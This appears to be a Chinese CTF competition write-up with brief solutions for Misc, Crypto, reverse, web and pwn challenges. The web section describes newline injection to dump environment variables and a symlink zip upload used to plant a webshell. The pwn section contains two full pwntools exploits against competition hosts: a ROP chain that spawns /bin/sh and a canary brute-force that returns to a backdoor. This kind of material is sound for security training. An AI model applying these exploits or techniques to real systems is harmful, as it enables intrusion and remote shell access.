Misc
签到
代码:print(open('/flag').read())
得到flag
被加密的生产流量
追踪tcp.stream eq 0的TCP流
“MMYWMX3GNEYWOXZRGAYDA===”经过base32解密得到flag
pyshell
沙箱逃逸,长度限制加上白名单设置,用字符串拼接和白名单的字符
国粹
a和k是坐标,把题目图片这个表作为横轴和纵轴,坐标(a,k)涂黑即可
Crypto
基于国密SM2算法的密钥
公钥A_Public_Key
7624DAC71A7D3E142979AA800B65005E743F0C62FCB771AC81849316B8E21E16BC3B3EFF9F42C53D1B933C69E8DE20EFD477D8AAD4E595781F50250EA1D1DA21
私钥A_Private_Key
1F43875CE7F4984973900E242C915CE324574F5A19AA6D348846F96753D9A831
公钥B_Public_Key
042c5e9a5ee7fa9e83437b5e92c7d695027ecde1807982961adfdf4622275da34bbfcbde575621d81335e7916f656b36de5ba1b7bc003f1b8c5c8a62db625da3d8
私钥B密文
c882c5209f00c20245e3c967634f81fc3ef398ec039355ff6b6ec2053f6bd6a7
私钥b明文
C2 A1 C9 75 7A D1 97 E8 E9 6D 5C 0F 53 86 DA 0A BB 28 16 11 DA 58 71 24 B1 52 81 85 BB 38 46 EA
c密文
41fb2d26589b420faee4c498f6b309ead00681bbb28dc4d98c49830489c061ef6917fc524126fbe3c9492c447f8a415414e8301fa9be6938b3edea175890dceaadec874ee0d3e321b4dfa0ef27b93586d8c6df76fbe4b7beae795f566d3fc1580904a375483c5149ddad2fda16c68106
c明文
BD 37 75 32 F5 15 0D DB C6 10 9A E6 93 1D 6B 40
d密文
4138c6bb7a4ebe754e0e0b313b7b4b9299832e458eb1c5b635200f1782cbcecad7444e6884af2b0733e1448d0205a43dada5e288ce8fc32324c4a48627f5a65204d8ecf80c999bc09a3b0d7b19b936fa082fbdcc8ed818ed05b6caa568ca44a24e2b2e7f7e9d6e3245bae24554758fd0
d明文
5D 19 64 7C E1 AD 02 72 ED 06 96 B9 5D 50 DE 71
可信度量
命令:find * | grep -ra "flag{"
得到flag
Sign_in_passwd
url编码:
base64:
reverse
babyre
下载,第一行官网
进去导入源码得到编译好的,分析
截屏左边是列表,右边是逻辑,有一个letter i of key和letter i-1 of key两个逻辑,结合列表第一个ascall码转字符串是"f"想到前后异或,写脚本成功跑出
ciphertext_list = [102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30]
for i in range(1, len(ciphertext_list)):
ciphertext_list[i] = ciphertext_list[i - 1] ^ ciphertext_list[i]
for i in ciphertext_list:
print(chr(i),end='')
web
dumpit
题目说 尝试用 ?db=&table_2_query= 或者 ?db=&table_2_dump=
先试试这个 ?db=ctf&table_2_query=flag1
看上去像从表中查信息
?db=ctf&table_2_dump=flag1 另一个
看上去是访问日志
查了很多 全是假flag
而这个看的日志结果都是一样 感觉可能对flag1过滤了 用%0a 结果sql语句日志全出了
看完发现并没有真的flag 认为flag可能不在数据库中 想到之前做过模板注入,flag在/etc/passwd tmp env中 所以猜测会不会在环境变量中
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump=env
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_query=env
并没有 尝试%0a 绕过
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump= env
找到flag
unzip
ln -s /var/www/html test
创建指向 /var/www/html 的软连接 并压缩
在test目录下写木马
再压缩 ln -s /var/www/html test
然后先上传test 再上传test1
首先应该那边有了/tmp/test,这是个指向/var/www/html的软连接,然后再上传test1.zip进行解压的时 候,实际上应该是把test.php解压到/tmp/test这个目录下
然后catflag
pwn
烧烤摊儿
这个题因为是静态,可以直接找程序里面的gadgets
从pijiu里修改money,因为这是无符号整数型直接就改为负数即可(-999999)
进入vip函数修改own的值。
使用ROPgadget --binary p3 --ropchain获取payload。
exp
from pwn import*
from struct import pack
sh=remote('39.105.187.49',34749)
#sh=process('./p3')
elf=ELF('./p3')
sh.sendlineafter(b'> ',"1")
sh.sendlineafter(b'\n',"1")
sh.sendlineafter(b'\n',"-999999")
sh.sendlineafter(b'> ',"4")
sh.sendlineafter(b'> ',"5")
p = b''
p+=b'a'*0x28
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402404) # syscall
sh.sendline(p)
sh.interactive()
y
funcanary
主函数如下,开了地址随机化和canary
进函数看,是一个read函数爆破点
而且有fork()函数可以多线程运行程序,考虑爆破canary
exp如下
from pwn import*
p = remote("39.105.26.155", 32292)
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(7):
for i in range(256):
payload = 'a'*0x68 + canary + chr(i)
p.send(payload)
data = p.recvuntil("welcome\n")
print(data)
if b"fun" in data:
canary += chr(i)
print("canary is:" + canary)
break
back_door = 0x1231
payload = b'a' * 0x68 + p64(u64(canary)) + b'a' * 8 + p16(0x1231)
p.send(payload)
p.interactive()